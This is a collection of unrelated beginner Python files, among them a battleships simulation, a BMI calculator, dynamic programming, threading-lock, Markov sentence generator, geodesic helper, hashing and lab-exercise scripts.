    """Play one battleships game with uniformly random guesses.

    Returns the board's guess history once the game is over.
    """
    board = generate_board(size, ships, False)
    if print_output:
        board.draw_board(False)
    while not board.game_over:
        # Random candidate position; validity is decided by take_guess.
        position = board.get_random_pos()
        was_valid, _, _ = board.take_guess(position, print_output)
        if was_valid and print_output:
            board.draw_board(False)
            print("Guess: %s" % (pos_to_code(position)))
    return board.guesses


if __name__ == '__main__':
    random_guessing(10, STD_SHIPS, True)
|
391fe3fde5c5ed7e4fdf1c6845738eb898a75bdf | louizcerca/python | /immc.py | 1,873 | 3.765625 | 4 | # python 2.7.12
peso = float(input('Insira o peso: '))
print(peso)
altura = float(input('Insira a altura: '))
print(altura)
imc = (peso / (altura * altura))
ideal1 = ((altura * altura) * 18.52)
ideal2 = ((altura * altura) * 24.97)
perda1 = round(peso - ideal2)
perda2 = round(peso - ideal1)
pideal1 = round(ideal1)
pideal2 = round(ideal2)
print('Seu IMC e:', round(imc, 2))
if imc < 16.99:
print('Muito abaixo do peso')
print('Voce necessitaria ganhar aproximadamente entre', round(ideal1 - peso), 'e', round(ideal2 - peso), 'kg para atingir o peso ideal(', pideal1, 'e', pideal2, 'kg)')
elif 17.0 < imc < 18.49:
print('Abaixo do peso')
print('Voce necessitaria ganhar aproximadamente entre', round(ideal1 - peso), 'e', round(ideal2 - peso),
'kg para atingir o peso ideal(', pideal1, 'e', pideal2, 'kg)')
elif 18.5 < imc < 24.99:
print('Parabens, voce esta no peso ideal')
elif 25.0 < imc < 29.99:
print('Voce esta acima do peso')
print('Voce necessitaria perder aproximadamente entre', perda1, 'e', perda2,
'kg para atingir o peso ideal(', pideal1, 'kg e', pideal2, 'kg)')
elif 30.0 < imc < 34.99:
print('Voce esta com Obesidade Grau I')
print('Voce necessitaria perder aproximadamente entre', perda1, 'e', perda2,
'kg para atingir o peso ideal(', pideal1, 'kg e', pideal2, 'kg)')
elif 35.00 < imc < 39.99:
print('Voce esta com Obesidade Grau II (Severa)')
print('Voce necessitaria perder aproximadamente entre', perda1, 'e', perda2,
'kg para atingir o peso ideal(', pideal1, 'kg e', pideal2, 'kg)')
elif imc > 40:
print('Voce esta com Obesidade Grau III (Morbida)')
print('Voce necessitaria perder aproximadamente entre', perda1, 'e', perda2,
'kg para atingir o peso ideal(', pideal1, 'kg e', pideal2, 'kg)')
|
60a4d2399b0b29de99247fa29f78f59ad804a787 | mukulb90/datastructure | /dynamic_programming/longest_increasing_subsequence.py | 698 | 3.921875 | 4 | def _longest_increasing_subsequence(arr, end):
cost = [1 for item in arr];
for outer in range(1, end + 1):
max_so_far = cost[0];
for inner in range(0, outer):
# lis till inner -> cost[inner]
if(arr[inner] < arr[outer]):
max_so_far = max([cost[inner] + 1, max_so_far])
cost[outer] = max_so_far;
return cost[end];
def longest_increasing_subsequence(arr):
    """Length of the longest strictly increasing subsequence of arr (0 if empty)."""
    if not arr:
        return 0  # guard: the helper indexes arr and would fail on []
    return _longest_increasing_subsequence(arr, len(arr) - 1)
def main():
    """Run the LIS computation on the LeetCode 300 sample input."""
    # Renamed from 'input', which shadowed the built-in.
    raw = '10, 9, 2, 5, 3, 7, 101, 18'
    numbers = [int(token) for token in raw.split(', ')]
    print(longest_increasing_subsequence(numbers))


if __name__ == '__main__':
    main()
|
b7d94637e17b45fb36bdde04fb4daf1ad3fd1e0c | vnyk/prg | /scopeElementsSum.py | 1,491 | 4.125 | 4 | """
The absolute difference between two integers a and b is written |a - b|. The
maximum absolute difference of a set S of positive integers is the largest
absolute difference between any two integers in S.

The Difference class is started for you in the editor. It has a private integer
array (__elements) for storing non-negative integers, and a public integer
(maximumDifference) for storing the maximum absolute difference.

Task
Complete the Difference class by writing the following:
- A class constructor that takes an array of integers as a parameter and saves
  it to the __elements instance variable.
- A computeDifference method that finds the maximum absolute difference between
  any two numbers in __elements and stores it in the maximumDifference
  instance variable.

Output Format
You are not responsible for printing any output; the Solution class will print
the value of the maximumDifference instance variable.
"""
class Difference:
    """Finds the maximum absolute difference between any two stored integers."""

    def __init__(self, a):
        # Private (name-mangled) store of the non-negative integers.
        self.__elements = a

    def computeDifference(self):
        """Compute and store the maximum absolute difference.

        BUG FIX: the original read the module-level variable 'a' instead of
        the instance's own __elements. For non-negative integers the largest
        |x - y| is simply max - min.
        """
        elements = self.__elements
        self.maximumDifference = max(elements) - min(elements)
        return (self.maximumDifference)
# End of Difference class
# Driver: the first stdin line is the element count (unused); the second
# holds the space-separated elements. The name 'a' is kept as-is because
# other module-level code may refer to it.
_ = input()
a = [int(token) for token in input().split(' ')]
d = Difference(a)
d.computeDifference()
print(d.maximumDifference)
# ====================== RESULT ======================
# Input (stdin):
#   3
#   1 2 5
# Expected Output:
#   4
|
68da17c34eb663ae956eb9e86f25021997ea7350 | eduhmc/CS61A | /Teoria/Class Code/32.py | 742 | 4.03125 | 4 | ### DEMO1: sum_primes python O(1) vs scheme O(n)
def is_prime(x):
    """Return whether x is prime.

    >>> [is_prime(x) for x in range(1, 10)]
    [False, True, True, False, True, False, True, False, False]
    """
    if x <= 1:
        return False
    # Trial division only up to sqrt(x): any composite has a factor no larger
    # than its square root (the original scanned all of range(2, x)).
    return all(x % y for y in range(2, int(x ** 0.5) + 1))
def sum_primes(a, b):
    """Sum all primes in the interval range(a, b).

    >>> sum_primes(1, 10)
    17
    """
    # Explicit accumulation loop (contrast with sum_primes_filter below).
    total = 0
    for candidate in range(a, b):
        if is_prime(candidate):
            total += candidate
    return total
def sum_primes_filter(a, b):
    """Sum all primes in the interval range(a, b), using filter().

    >>> sum_primes_filter(1, 10)
    17
    """
    return sum(filter(is_prime, range(a, b)))
|
d17206461651c5113b101a69e4ea5c0fc308c871 | shreyassk18/MyPyCharmProject | /DataType/Strings/String_immutable.py | 413 | 4.09375 | 4 | #Strings are immutable, which means address of the variable will be changed when you modify the variable
# An object's identity (its address in CPython) is revealed by the id() function.
str1 = "name"
str2 = "organization"
print(id(str1))  # e.g. 1758994627248
print(id(str2))  # e.g. 1759026452144
# Concatenation builds a brand-new string object and rebinds str2 to it.
str2=str2 + "onmobile"
print(id(str1))  # unchanged: str1 still refers to the same object
print(id(str2)) #1759026457672 #so this variable address got changed as we have changed the value |
b2b6592381386761dd512a2e75373009d8a0fecf | gestone/TechGen | /sentence_generator.py | 4,121 | 3.875 | 4 | """
Generates random sentences using Markov Models.
"""
import psycopg2
import random
import re
import os
from nltk import bigrams # to get tuples from a sentence in the form: (s0, s1), (s1, s2)
class SentenceGenerator(object):
    """
    Generates random sentences. Since SentenceGenerator is
    implemented using a Markov Model, input data must first
    be put in to train the model before being able to generate
    sentences.

    NOTE: Python 2 code (xrange; dict.keys() passed to random.choice).
    """
    def __init__(self, classifier, logger):
        """
        Constructs a new instance of SentenceGenerator with
        an untrained Markov Model, then trains it on every phrase
        stored in the Postgres database.
        """
        # model maps word -> list of observed successor words (with
        # repetitions, so random.choice follows the observed frequencies).
        self.model = {}
        self.classifier = classifier
        self.logger = logger
        self._train_model()

    @classmethod
    def _is_end_word(cls, word):
        """
        Checks to see if the word is a terminal word,
        true if so, false otherwise.
        """
        # Terminal words end in sentence punctuation, e.g. "done." or "why?".
        return bool(re.match(r"\w+[:.?!*\\-]+", word))

    def train_model(self, input_data):
        """
        Trains the model with input_data, a simple space seperated
        English sentence(s). If the last sentence or phrase does not
        contain ending punctuation, a "." will be appended to the last
        word contained.
        """
        self.logger.debug("Training generator on '%s' " % input_data)
        split_data = input_data.split()
        # Clean the input and make sure that the last element
        # has some form of punctuation, if not, append '.'.
        if split_data and not SentenceGenerator._is_end_word(split_data[-1]):
            split_data[-1] += "."
        # bigrams returns -> [(s0, s1), (s1, s2)...]
        # where each s_i is a word
        markov_states = bigrams(split_data)
        for init_state, pos_state in markov_states:
            all_pos_states = self.model.get(init_state, [])
            all_pos_states.append(pos_state)
            self.model[init_state] = all_pos_states

    def _train_model(self):
        """
        Trains the model with the results back from the Postgres database.
        """
        res = self._query_data()
        for phrase in res:
            # Each row is a 1-tuple holding the phrase text.
            self.train_model(phrase[0])

    def generate_sentence(self, initial_word=None):
        """
        Randomly generates a sentence with an initial word. If no initial
        word is specified, a random word will be chosen as the start word.

        Raises ValueError when initial_word is given but was never observed
        during training.
        """
        if initial_word:
            # verify that its in the dictionary
            if initial_word not in self.model:
                raise ValueError("\'" + initial_word + "\' was not found")
            cur_state = initial_word
        else:
            cur_state = random.choice(self.model.keys())
        # try generating a sentence 10000 times, if not possible, return err msg
        for _ in xrange(10000):
            cur_sentence = []
            cur_sentence.append(cur_state)
            # Walk the chain until a terminal word or a dead end is reached.
            # NOTE(review): 'in self.model.keys()' is an O(n) list scan in
            # Python 2; 'in self.model' would be O(1).
            while not self._is_end_word(cur_state) and cur_state in self.model.keys():
                # get all possible states and randomly choose a state to go to
                all_future_states = self.model[cur_state]
                cur_state = random.choice(all_future_states)
                cur_sentence.append(cur_state)
            # finished generating a sentence, generate a new state if not passed one
            cur_state = initial_word if initial_word else random.choice(self.model.keys())
            full_sentence = " ".join(cur_sentence)
            # Only return sentences the classifier accepts as well-formed.
            if self.classifier.classify(full_sentence):
                self.logger.debug("Successfully generated a sentence!")
                return full_sentence
        return "Error could not generate sentence."

    def _query_data(self):
        """
        Queries the phrases to be trained on from the PostgresDB.
        """
        # NOTE(review): the connection and cursor are never closed here.
        self.logger.debug("Querying phrases from the DB...")
        conn = psycopg2.connect(database=os.environ["DATABASE"], user=os.environ["USER"])
        cur = conn.cursor()
        cur.execute("SELECT phrase FROM phrases ORDER BY fetch_date DESC")
        self.logger.debug("Success, returning results")
        return iter(cur.fetchall())
ed613433eaa50d87afe31c8a9a97f737545e666d | andyleva/kurs-python | /lesson01-hw6.py | 1,358 | 4.03125 | 4 | # 6. Спортсмен занимается ежедневными пробежками. В первый день его результат составил a
# kilometres. Each day the athlete improves on the previous day's distance by
# 10%. Task: determine the day on which the result first reaches at least b km.
# The program reads a and b and prints one natural number - the day number.
# Example: a = 2, b = 3 -> "on day six the athlete reached at least 3 km".
a = int(input("Введите значение a - пробежка в первый день:"))
b = int(input("Введите значение b - требуемый конечный размер пробежки в день:"))
i = 1
print(f"{i} - й день: {a}")
# BUG FIX: stop as soon as a >= b. With 'a <= b' the case a == b ran one
# extra day and reported the wrong day number.
while a < b:
    a += a * 0.1
    i += 1
    print(f"{i} - й день: {a:.2f}")
print(f"Ответ: на {i}-й день спортсмен достиг результата - не менее {b} км")
|
59e0d0a11e668484d9a821e73084131f4d48d3b2 | SeanHarveyOfiangga/Assignment-1 | /test.py | 168 | 3.9375 | 4 | """ Basic Addition Calculator """
# Read the two integer operands from the user.
a = int(input("Enter your first number: "))
b = int(input("Enter your second number: "))
# Their sum is echoed by the print on the next line.
result = a + b
print(f"{a} + {b} = {result}") |
eec25dd6059841bd877644950a313cd11c5ddab2 | RavikrianGoru/py_durga | /byte_of_python/py_oop/inheritance_subclass.py | 1,682 | 4.375 | 4 | class SchoolMember:
    '''Represents any school member (base/super class).'''

    def __init__(self, name, age):
        self.name = name
        self.age = age
        print(f'Initializing SchoolMember: {self.name}')

    def details(self):
        # end=" " lets subclasses append their extra fields on the same line.
        print(f'Details Name : {self.name}, Age : {self.age}', end=" ")
class Teacher(SchoolMember):
    '''Represents any teacher. child/sub class'''

    def __init__(self, name, age, sal):
        # Run the SchoolMember initialiser first, then add teacher-only state.
        super().__init__(name, age)
        self.sal = sal
        print(f'Initializing Teacher: {self.name}')

    def details(self):
        # The base prints name/age without a newline; append the salary.
        super().details()
        print(f'Salary : {self.sal}', end=" ")
class Student(SchoolMember):
    '''Represents any Student. child/sub'''

    def __init__(self, name, age, marks):
        # Run the SchoolMember initialiser first, then add student-only state.
        super().__init__(name, age)
        self.marks = marks
        print(f'Initializing Student: {self.name}')

    def details(self):
        # The base prints name/age without a newline; append the marks.
        super().details()
        print(f'Marks : {self.marks}', end=" ")
def main():
    """Build a mixed teacher/student roster and print everyone's details."""
    members = [
        Teacher('Mr. Madhu', 35, 35000.00),
        Teacher('Mss. Lakshmi', 32, 34000.00),
        Student('Ravi', 26, 75),
        Student('Kiran', 25, 77),
        Student('Devi', 24, 79),
    ]
    # details() is polymorphic: each subclass appends its own extra field.
    for member in members:
        member.details()
        print()
if __name__ == '__main__':
main() |
5974ad8fbaf5927bdfab41b0cb3b16c9d56ad86c | ishantk/KnowledgeHutHMS2020 | /Session4R.py | 2,855 | 4.09375 | 4 | """
Synchronization
"""
import time
import threading
# create a Lock Object
lock = threading.Lock()
class MovieTicket:
    """One seat for one showing; tracks whether it has already been sold."""

    def __init__(self, name, time, row, seat_num):
        self.name = name
        self.time = time
        self.row = row
        self.seat_num = seat_num
        self.is_booked = False

    def book_movie_ticket(self):
        """Mark the seat as sold and print the ticket summary (only once)."""
        if self.is_booked:
            print(".........")
            return
        self.is_booked = True
        print("~~~~~~~~~~~~~~")
        print("Ticket Details")
        print("{} | {}".format(self.name, self.time))
        print("{} | {}".format(self.row, self.seat_num))
        print("~~~~~~~~~~~~~~")

    def pay(self, email):
        """Simulate a 5-second payment; refuse when the seat is already sold."""
        self.email = email
        if self.is_booked:
            print("Sorry {}, Ticket {} | {} is UNAVAILABLE".format(self.email, self.row, self.seat_num))
            return
        print("{}, Please Pay for Your Movie Ticket {} | {}".format(self.email, self.row, self.seat_num))
        time.sleep(5)  # stand-in for a payment transaction taking 5 seconds
        print("Thank You {}. We have booked your Ticket {} | {} and sent the email".format(self.email, self.row, self.seat_num))

    def __str__(self):
        return " | ".join(str(field) for field in (self.name, self.time, self.row, self.seat_num))
class BookMovieTicketTask(threading.Thread):
    """Worker thread that pays for and books one ticket under the global lock."""

    def select_seat(self, ticket, email):
        """Remember which ticket to buy and for whom; call before start()."""
        self.ticket = ticket
        self.email = email

    def run(self):
        # Use the lock as a context manager so it is released even if pay()
        # or book_movie_ticket() raises. The original bare acquire()/release()
        # pair would leave the lock held forever after an exception,
        # deadlocking every other booking thread.
        with lock:
            self.ticket.pay(email=self.email)
            self.ticket.book_movie_ticket()
def main():
    """
    ticket1 = MovieTicket(name="Avengers", time="20:00", row="A", seat_num=1)
    ticket2 = MovieTicket(name="Avengers", time="20:00", row="A", seat_num=2)
    ticket3 = MovieTicket(name="Avengers", time="20:00", row="A", seat_num=3)
    ticket4 = MovieTicket(name="Avengers", time="20:00", row="A", seat_num=4)
    ticket5 = MovieTicket(name="Avengers", time="20:00", row="A", seat_num=5)
    ticket6 = MovieTicket(name="Avengers", time="20:00", row="A", seat_num=6)
    ticket7 = MovieTicket(name="Avengers", time="20:00", row="A", seat_num=7)
    ticket8 = MovieTicket(name="Avengers", time="20:00", row="A", seat_num=8)
    ticket9 = MovieTicket(name="Avengers", time="20:00", row="A", seat_num=9)
    ticket10 = MovieTicket(name="Avengers", time="20:00", row="A", seat_num=10)
    """
    # Build row A (seats 1..10) in a loop instead of the hand-rolled
    # ticket1..ticket10 kept above in the docstring for reference.
    row_a = []
    for i in range(1, 11):
        row_a.append(MovieTicket(name="Avengers", time="20:00", row="A", seat_num=i))
    for ticket in row_a:
        print(ticket)
    # Two threads race to buy the SAME seat (row_a[5]); the global lock in
    # BookMovieTicketTask.run serializes them so only the first succeeds.
    task1 = BookMovieTicketTask()
    task2 = BookMovieTicketTask()
    task1.select_seat(ticket=row_a[5], email="john@example.com")
    task2.select_seat(ticket=row_a[5], email="fionna@example.com")
    task1.start()
    task2.start()
if __name__ == '__main__':
main() |
83cb7da034cf3000737f8e7afa4723095edb2d5b | jojonas/py1090 | /py1090/helpers.py | 3,478 | 3.984375 | 4 | import math
EARTH_RADIUS = 6371008.7714 # m
r"""The average earth radius :math:`R_0`, defined as the mean radius of the
semi-axes, per the WGS 84 (World Geodetic System 1984) ellipsoid.

.. math::
    R_0 = 6371008.7714 \mathrm{m}
"""


def distance_between(lat1, lon1, lat2, lon2):
    r"""Great-circle distance in meters between two points, via the
    `Haversine <http://en.wikipedia.org/wiki/Haversine_formula>`_ formula
    on a sphere of radius :py:data:`EARTH_RADIUS`.

    Args:
        lat1 (float): latitude of the reference location
        lon1 (float): longitude of the reference location
        lat2 (float): latitude of the target location
        lon2 (float): longitude of the target location

    Returns:
        float: the distance in meters.
    """
    phi1, lam1, phi2, lam2 = map(math.radians, (lat1, lon1, lat2, lon2))
    sin_half_dphi = math.sin((phi2 - phi1) / 2)
    sin_half_dlam = math.sin((lam2 - lam1) / 2)
    a = (sin_half_dphi * sin_half_dphi
         + math.cos(phi1) * math.cos(phi2) * sin_half_dlam * sin_half_dlam)
    # Central angle between the two points, numerically stable via atan2.
    central_angle = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))
    return EARTH_RADIUS * central_angle
def bearing_between(lat1, lon1, lat2, lon2):
    r"""Bearing angle in radians (range :math:`-\pi` to :math:`\pi`)
    between two latitude/longitude locations.

    NOTE(review): the formula uses cos(phi1) in the first atan2 argument and
    cos(phi2)*sin(phi1) - sin(phi2)*cos(phi1)*cos(dlambda) in the second,
    which mirrors the original module; the conventional forward-azimuth
    formula swaps phi1/phi2 here — confirm which direction is intended.

    Args:
        lat1 (float): latitude of the reference location
        lon1 (float): longitude of the reference location
        lat2 (float): latitude of the target location
        lon2 (float): longitude of the target location

    Returns:
        float: the bearing angle in radians.
    """
    phi1, lam1, phi2, lam2 = map(math.radians, (lat1, lon1, lat2, lon2))
    dlam = lam2 - lam1
    y = math.sin(dlam) * math.cos(phi1)
    x = math.cos(phi2) * math.sin(phi1) - math.sin(phi2) * math.cos(phi1) * math.cos(dlam)
    return math.atan2(y, x)
def knots_to_kmh(knots):
    """Convert a velocity from knots to km/h.

    One knot is one nautical mile per hour, i.e. exactly 1.852 km/h.

    Args:
        knots (float): velocity in knots

    Returns:
        float: velocity in km/h
    """
    return knots * 1.852
def knots_to_mps(knots):
    """Converts velocity in knots to velocity in m/s (meters per second).

    1 knot is 1 nm/h (nautical mile per hour), 1.852 km/h and about 0.514 m/s.

    Args:
        knots (float): velocity in knots

    Returns:
        float: velocity in m/s
    """
    # km/h -> m/s divides by 3.6 (1000 m per km / 3600 s per h). The original
    # multiplied by 3.6, returning 6.667 for 1 knot instead of 0.514, and its
    # docstring repeated the wrong figure.
    return knots * 1.852 / 3.6
|
80739d61b3cf031d93248ea3b5d6a6814c732aeb | luandadantas/URI-Python | /iniciante/1042_sort_simples.py | 248 | 3.515625 | 4 | A, B, C = input().split()
A = int(A)
B = int(B)
C = int(C)
valores_crescentes_list = [A, B, C]
valores_crescentes_list.sort()
ordem_original = [A, B, C]
for i in valores_crescentes_list:
print(i)
print()
for i in ordem_original:
print(i) |
76a15c11ba8ade5d665c07f103e4e00e1e2b82f4 | NVGNVG/python_project | /Cryp_pass_project.py | 715 | 4.03125 | 4 | #Made by:NVG
# Python 3 code: Hash creator
# Get hash generator (string >> hexadecimal)
import hashlib
#Input and initializing
# Prompt for the word to digest.
print('Word to convert to hash:')
word = input()
print('Word: ' + word)

# Hash the UTF-8 encoding of the input with three different algorithms.
encoded = word.encode()
md5_hash = hashlib.md5(encoded)
sha512_hash = hashlib.sha512(encoded)
blake2b_hash = hashlib.blake2b(encoded)

# Print each digest as a hexadecimal string.
print("The hexadecimal equivalent of MD5 hash is : " + md5_hash.hexdigest())
print("The hexadecimal equivalent of SHA512 hash is : " + sha512_hash.hexdigest())
print("The hexadecimal equivalent of BLAKE2b hash is : " + blake2b_hash.hexdigest())
e52f61bd060ef4f43a9bcb2d4de21a93091f9e09 | arun007chauhan/tutorials_pmath | /linerarAlgebra/linear_transformation.py | 4,125 | 3.921875 | 4 | import numpy as np
import matplotlib.pyplot as plt
# what does it mean linear transformation
"""
def --> A linear transformation T:U->V,is a
function or operator that carries elements of vector space U(called domain)
to vector space V(called cododomain),and which has to two aditional properties
T(u1) + T(u2) = T(u1) + T(u2) for all u1,u2∈U
T(αu)=αT(u)
(T+S)(u)=T(u)+S(u)
(αT)(u)=αT(u)
(S∘T)(u)=S(T(u)) composition
"""
# let's consider the matrices A and B as linear operators that act over vector(linear) space L
A = np.array([[1, 3, 4],
[2, 3, 4],
[4, 3, 2]])
B = np.array([[2, 4, 5],
[4, 5, 6],
[4, 5, 3]])
# let's get the vectors x and y belongs of vector space L
x = np.array([[1],
[2],
[4]])
y = np.array([[3],
[5],
[7]])
result1 = A.dot(x + y)
result2 = A.dot(x) + A.dot(y)
if (result1 == result2).all:
print("distributed")
result1 = 5 * A.dot(x)
result2 = 5 * A.dot(x)
if (result1 == result2).all:
print("commutative in multiplication by real numbers")
C = A.dot(B)
result1 = C.dot(x)
result2 = B * (A.dot(x))
if (result1 == result2).all:
print("composition of operators is real fact")
# let's review some more advanced theorems
"""
let's define rotation of vector
Oiler matrix
[sin(a) , 0 , 0]
[0 , cos(a) , 0]
[0 , 0 . cos(a)]
"""
def get_rotation_matrix(angle):
    """Return the 2x2 counter-clockwise rotation matrix for *angle* radians."""
    c, s = np.cos(angle), np.sin(angle)
    return np.array([[c, -s],
                     [s, c]])
def get_translation_matrix(mutiplier):
    """Return the 2x2 uniform scaling matrix mutiplier * I.

    NOTE(review): despite the name this is a scaling, not a translation,
    matrix; the name (and its typo) are kept because callers use them.
    """
    return np.diag([mutiplier, mutiplier])
R = get_rotation_matrix(0)
"""
when determinant is equal 1 this means
the matrix is orthogonal
"""
# print(R)
# print(np.linalg.det(R)) ## determinant is equal 1
# lets get the eigenvectors values and vectors of R
# print(np.linalg.eig(R))
"""
rotation example
"""
x = np.array([[1],
[0]])
origin = [0], [0] # origin point
# plt.quiver(*origin, (x[:,0]), [0,1], color=['black','black'], scale=10)
ax = plt.axes()
ax.arrow(0, 0, 10, 0, head_width=0.3, head_length=0.2, fc='black', ec='black') # create e1 axes
ax.arrow(0, 0, 0, 10, head_width=0.3, head_length=0.2, fc='black', ec='black') # create e2 axes
plt.xlim(0, 10) # show measure
plt.ylim(0, 10)
R = get_rotation_matrix(np.pi / 6) # 30 degree
# decoment to see result
#
# rot_x = R.dot(x)
#
# x = np.array([[1],
# [0]])
#
# ax.arrow(2, 2, int(x[0, 0]), int(x[1, 0]), head_width=0.5, head_length=0.7, fc='red', ec='black')
#
# # plt.quiver(*origin, (x[:,0]),(u[:,0]),(u[:,0]), color=['black','black'], scale=10)
# # plt.quiver(*origin, x[:,0], color=['blue','black'], scale=10)
#
# u = R.dot(x)
#
# ax.arrow(2, 2, u[0, 0], u[1, 0], head_width=0.5, head_length=0.7, fc='lightblue', ec='black')
#
# u = R.dot(u)
#
# ax.arrow(2, 2, u[0, 0], u[1, 0], head_width=0.5, head_length=0.7, fc='green', ec='black')
#
# u = R.dot(u)
#
# ax.arrow(2, 2, u[0, 0], u[1, 0], head_width=0.5, head_length=0.7, fc='blue', ec='black')
#
plt.grid
# plt.show()
"""
let's see the tranlation of vector
the translation of vector
"""
x = np.array([[1],
[2]])
#ax.arrow(2, 2, x[0, 0], x[1, 0], head_width=0.3, head_length=0.2, fc='blue', ec='black')
T = get_translation_matrix(3)
x = T.dot(x)
#ax.arrow(2, 2, x[0, 0], x[1, 0], head_width=0.3, head_length=0.2, fc='blue', ec='black')
#plt.show() decoment to result
"""
the dot(scalar product is always the same number in every different coordinates system
"""
"""
lets to make some more to see the power of operators
if we want to roate some vector with 30 degree and to increase it with some mutiplier n
"""
R = get_rotation_matrix(np.pi/6)
T = get_translation_matrix(5)
x = np.array([[1],
[1]])
ax.arrow(2, 2, x[0, 0], x[1, 0], head_width=0.3, head_length=0.2, fc='blue', ec='black')
transform = R.dot(T)
x = transform.dot(x)
ax.arrow(2, 2, x[0, 0], x[1, 0], head_width=0.3, head_length=0.2, fc='blue', ec='black' ,label='Arrow2')
plt.text(x[0, 0],x[1, 0], 'translation')
plt.show() |
34c32af3ed1de9c4b2e4c7f1a142e213e4a2ff35 | Lyxilion/McColloch-Pitts | /McColloch-Pitts.py | 1,680 | 3.609375 | 4 | def sgn(x:float):
"""
La fonction sign
:param x: un nombre
:return: 1 ou 0
:rtype: int
"""
if x<0:
return 0
else :
return 1
def f(X: list, H: list, t: int):
    """
    McCulloch-Pitts transfer function.

    :param X: list of excitatory connection inputs
    :param H: list of inhibitory connection inputs
    :param t: activation threshold
    :return: the neuron's response (1 or 0)
    """
    # Any active inhibitory input forces the neuron to output 0.
    if sum(H) != 0:
        return 0
    # Otherwise fire iff the total excitation reaches the threshold.
    return sgn(sum(X) - t)
"""
Fonctionnement :
Un neurone est représenté par une fonction de transfert, qui prend trois arguments :
-Une liste des connexions activatrices
-Une liste des connexions inhibitrices
-Un seuil
le seuil correspond au nombre de connexion activatrice qui doit être active pour que le neurone renvoie 1
si une seule connexion inhibitrice est vraie, le neurone renvoyé 0
"""
"""
Modélisation de la fonction répondant à cette table de vérité :
_________________
| Entre | Sorties |
|_________________|
| 001 | 1 |
| 011 | 1 |
| 101 | 1 |
| 111 | 1 |
| Sinon | 0 |
|_________________|
"""
X=[0,0,1]
print(f( #Si une des 4 chaines est trouvée, renvoie 1
[
f([X[2]],[X[0],X[1]],1), # Reconnaît la chaine '001'
f([X[1],X[2]],[X[0]],2), # Reconnaît la chaine '011'
f([X[0],X[2]],[X[1]],2), # Reconnaît la chaine '101'
f([X[0],X[1],X[2]],[0],3) # Reconnaît la chaine '111'
]
, [0], 1))
|
6fb6f0ae3d03bc1bb7ecfd76ddb54c7d71d3b496 | JackM15/python-mysql-practice | /carspractice.py | 350 | 3.78125 | 4 | # ---- Cars Practice ---- #
import sqlite3

# Connect to (creating if missing) the cars database file.
db = sqlite3.connect("cars.db")

# Cursor used to issue SQL statements.
cursor = db.cursor()

# Create a table called "cars" with make, model and quantity fields.
# (The original comment claimed the table was named "inventory".)
cursor.execute("""CREATE TABLE cars
(make TEXT, model TEXT, quantity INT)
""")

# Commit before closing so the statement is durable regardless of the
# sqlite3 module's transaction/autocommit behaviour.
db.commit()

# Close the database connection.
db.close()
|
eda1f0a1df8e9dd94e1ca7b9e64ff92a4dca049b | niyati2k/SSL | /pythonlab.py | 5,645 | 3.9375 | 4 | #!/usr/bin/env python
# coding: utf-8
# In[1]:
r=10
pi = 3.14
volume = (4/3)*pi*r*r*r
print (volume)
# In[ ]:
def add(a,b):
return a+b
def sub(a,b):
return a-b
def mult(a,b):
return a*b
def power(a,b):
return pow(a,b)
def div(a,b):
return a/b
def cal(d,a,b):
return d(a,b)
cal(power,5,10)
# In[5]:
def is_triangle(a, b, c):
    """Return "YES" if side lengths a, b, c can form a (possibly degenerate)
    triangle, else "NO".

    Fix: the original tested ``a+b>=c`` twice and never ``a+c>=b``, so inputs
    like (1, 5, 2) were wrongly accepted.
    """
    if a + b >= c and b + c >= a and a + c >= b:
        return "YES"
    return "NO"
a = int(input())
b = int(input())
c = int(input())
is_triangle(a,b,c)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# In[1]:
def f(n):
    """Return the n-th Fibonacci number, 1-indexed (f(1) == f(2) == 1).

    Iterative rewrite: the original naive double recursion was exponential
    in n and recursed without bound for n < 1.

    :raises ValueError: if n is not a positive integer.
    """
    if n < 1:
        raise ValueError("n must be a positive integer")
    a, b = 1, 1
    for _ in range(n - 2):
        a, b = b, a + b
    return b
n = int(input())
for i in range(1,n+1):
print (f(i), end=" ")
f(n)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# In[27]:
import math
const = 2*math.sqrt(2)/9801
k = 0
s = 0
var = pow(10,-15)
while 1:
temp = const*math.factorial(4*k)*(1103 + 26390*k)/(pow(math.factorial(k),4)*pow(396,4*k))
if temp<var :
break
s = s+ temp
k = k+1
print (1/s)
print(math.pi)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~`
# In[5]:
def my_reverse(s):
    """Print *s* reversed (slice-based rewrite of the char-prepend loop)."""
    print(s[::-1])
s = input()
my_reverse(s)
#or
import math
def my_rev(s):
s1=''
n=len(s)
for i in range(0,n):
s1=s1+s[n-1-i]
print(s1)
s=input()
my_rev(s)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~``
#QUES 7
def find_count(s, index, elem):
    """Print the count and the positions of *elem* in *s* after *index*.

    Only positions strictly greater than *index* are considered.
    """
    positions = [i for i in range(index + 1, len(s)) if s[i] == elem]
    print(len(positions), positions)
s = input()
p = int(input())
elem = input()
find_count(s,p,elem)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~`
# QUES 8
arr = [int(i) for i in input().split()]
s = []
s.append(arr[0])
for j in range(1,len(arr)):
s.append(s[j-1] + arr[j])
print (s)
#or
import math
def cum(l):
    """Return the running (cumulative) sums of *l* (assumes l is non-empty)."""
    running = [l[0]]
    for value in l[1:]:
        running.append(running[-1] + value)
    return running
elem=[1,2,3,4]
print(cum(elem))
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# QUES 9
def is_anagram(s1, s2):
    """Return True when *s1* and *s2* contain exactly the same characters
    with the same multiplicities.

    Rewritten with collections.Counter: the original indexed a 26-slot
    array with ord(c) - ord('a') and raised IndexError for anything other
    than lowercase ASCII letters; multiset comparison works for any
    characters and gives identical results on the old valid inputs.
    """
    from collections import Counter
    return Counter(s1) == Counter(s2)
s1 = input()
s2 = input()
is_anagram(s1,s2)
or
#import math
def is_ana(s1,s2):
if len(s1) != len(s2):
return False
a= []
b= []
for i in range(0,len(s1)):
a.append(s1[i])
b.append(s2[i])
a.sort()
b.sort()
for i in range(0,len(s1)):
if a[i] != b[i]:
return False
return True
a=input()
b=input()
print(is_ana(a,b))
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#QUES 10
Dic = {}


